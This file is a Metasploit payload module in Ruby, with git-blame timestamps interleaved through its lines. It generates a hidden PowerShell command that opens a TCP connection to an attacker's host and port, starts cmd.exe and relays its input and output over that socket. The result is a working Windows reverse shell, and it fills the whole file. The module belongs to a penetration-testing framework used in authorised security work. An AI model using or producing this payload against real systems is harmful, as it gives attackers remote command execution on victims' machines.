2014-02-08 01:00:31 +00:00
##
2014-10-17 11:47:33 -05:00
# This module requires Metasploit: http://metasploit.com/download
2014-02-08 01:00:31 +00:00
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'msf/core/handler/find_shell'
2014-03-14 19:28:00 +00:00
require 'msf/core/handler/reverse_tcp'
2014-02-08 01:00:31 +00:00
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
2016-03-08 14:02:44 +01:00
module MetasploitModule
2014-02-08 01:00:31 +00:00
2016-11-03 02:50:13 +10:00
CachedSize = 1228
2015-03-09 15:31:04 -05:00
2014-02-08 01:00:31 +00:00
include Msf :: Payload :: Single
include Msf :: Sessions :: CommandShellOptions
def initialize ( info = { } )
super ( merge_info ( info ,
'Name' = > 'Windows Command Shell, Reverse TCP (via Powershell)' ,
'Description' = > 'Connect back and create a command shell via Powershell' ,
2014-02-19 15:11:12 -06:00
'Author' = >
[
'Dave Kennedy' , # Original payload from trustedsec on SET
'Ben Campbell' # Metasploit module
] ,
'References' = >
[
2014-10-08 09:01:19 +00:00
[ 'URL' , 'https://github.com/trustedsec/social-engineer-toolkit/blob/master/src/powershell/reverse.powershell' ]
2014-02-19 15:11:12 -06:00
] ,
# The powershell code is from SET, copyrighted by TrustedSEC, LLC and BSD licensed -- see https://github.com/trustedsec/social-engineer-toolkit/blob/master/readme/LICENSE
2014-02-08 01:00:31 +00:00
'License' = > MSF_LICENSE ,
'Platform' = > 'win' ,
'Arch' = > ARCH_CMD ,
'Handler' = > Msf :: Handler :: ReverseTcp ,
'Session' = > Msf :: Sessions :: CommandShell ,
'PayloadType' = > 'cmd' ,
'RequiredCmd' = > 'powershell' ,
'Payload' = >
{
'Offsets' = > { } ,
'Payload' = > ''
}
) )
end
#
2014-02-19 15:21:02 -06:00
# Constructs the payload
2014-02-08 01:00:31 +00:00
#
def generate
return super + command_string
end
#
# Returns the command string to use for execution
#
def command_string
lhost = datastore [ 'LHOST' ]
lport = datastore [ 'LPORT' ]
powershell = " function RSC{ " \
2014-02-08 01:42:45 +00:00
" if ($c.Connected -eq $true) {$c.Close()}; " \
" if ($p.ExitCode -ne $null) {$p.Close()}; " \
" exit; " \
" }; " \
2014-02-08 01:00:31 +00:00
" $a=' #{ lhost } ';$p=' #{ lport } ';$c=New-Object system.net.sockets.tcpclient; " \
" $c.connect($a,$p);$s=$c.GetStream(); " \
" $nb=New-Object System.Byte[] $c.ReceiveBufferSize; " \
" $p=New-Object System.Diagnostics.Process;$p.StartInfo.FileName='cmd.exe'; " \
" $p.StartInfo.RedirectStandardInput=1;$p.StartInfo.RedirectStandardOutput=1; " \
" $p.StartInfo.UseShellExecute=0;$p.Start();$is=$p.StandardInput; " \
" $os=$p.StandardOutput;Start-Sleep 1;$e=new-object System.Text.AsciiEncoding; " \
" while($os.Peek() -ne -1){ " \
" $o += $e.GetString($os.Read()) " \
" }; " \
" $s.Write($e.GetBytes($o),0,$o.Length); " \
" $o=$null;$d=$false;$t=0; " \
" while (-not $d) { " \
2014-02-08 01:42:45 +00:00
" if ($c.Connected -ne $true) {RSC}; " \
2014-02-08 01:00:31 +00:00
" $pos=0;$i=1; " \
" while (($i -gt 0) -and ($pos -lt $nb.Length)) { " \
" $r=$s.Read($nb,$pos,$nb.Length - $pos); " \
" $pos+=$r; " \
2016-11-02 05:19:52 +10:00
" if (-not $pos -or $pos -eq 0) {RSC}; " \
" if ($nb[0..$($pos-1)] -contains 10) {break}}; " \
2014-02-08 01:00:31 +00:00
" if ($pos -gt 0){ " \
" $str=$e.GetString($nb,0,$pos); " \
" $is.write($str);start-sleep 1; " \
" if ($p.ExitCode -ne $null){RSC}else{ " \
" $o=$e.GetString($os.Read()); " \
" while($os.Peek() -ne -1){ " \
" $o += $e.GetString($os.Read()); " \
" if ($o -eq $str) {$o=''} " \
" }; " \
" $s.Write($e.GetBytes($o),0,$o.length); " \
" $o=$null; " \
" $str=$null " \
" } " \
" }else{RSC}}; " \
2014-02-19 15:11:12 -06:00
" powershell -w hidden -nop -c #{ powershell } "
2014-02-08 01:00:31 +00:00
end
end
